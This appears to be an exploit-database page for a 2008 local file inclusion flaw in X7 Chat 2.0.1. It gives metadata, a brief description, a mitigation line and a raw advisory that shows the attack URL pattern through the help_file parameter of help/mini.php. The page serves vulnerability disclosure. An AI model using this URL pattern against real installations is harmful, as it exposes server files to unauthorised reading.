header-logo
Suggest Exploit
vendor:
X7 Chat
by:
jiko
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: X7 Chat
Affected Version From: 2.0.1
Affected Version To: 2.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:x7chat:x7_chat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

X7 Chat Version 2.0.1 Local File Inclusion Vulnerability

A vulnerability exists in X7 Chat Version 2.0.1 which allows an attacker to include a local file via the help_file parameter in the mini.php script. An attacker can exploit this vulnerability to gain access to sensitive information or execute malicious code.

Mitigation:

Ensure that user input is properly sanitized and validated to prevent malicious code from being executed.
Source

Exploit-DB raw data:

-------------------------------------------------------------------------
  --          JIKI Team [ JIKO + KIl1er + merwan-neo ]        ---
-------------------------------------------------------------------------
# Author  : jiko
# email  : jalikom@hotmail.com
# Home   : www.no-exploit.Com
# Script  : X7 Chat Version 2.0.1
# Bug   :  Local File Inclusion Vulnerability
=========================JIkI Team===================
# Exploit  :
 
 http://localhost/[script]/help/mini.php?help_file=[file]
=========================JIKI Team===================
 greetz : all my friend and all No-back members and tryag.Com Gold_M
          Cochlain , Hcj , Hassin X , all muslims
 visit: www.no-back.org & www.tryag.com & ==> www.no-exploit.Com
-------------------------------------------------------------------------
  --            JIKI Team [ JIKO + KIl1er ]    --
-------------------------------------------------------------------------
------==        troops of Mohamed comming inchalah     =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

# milw0rm.com [2008-09-27]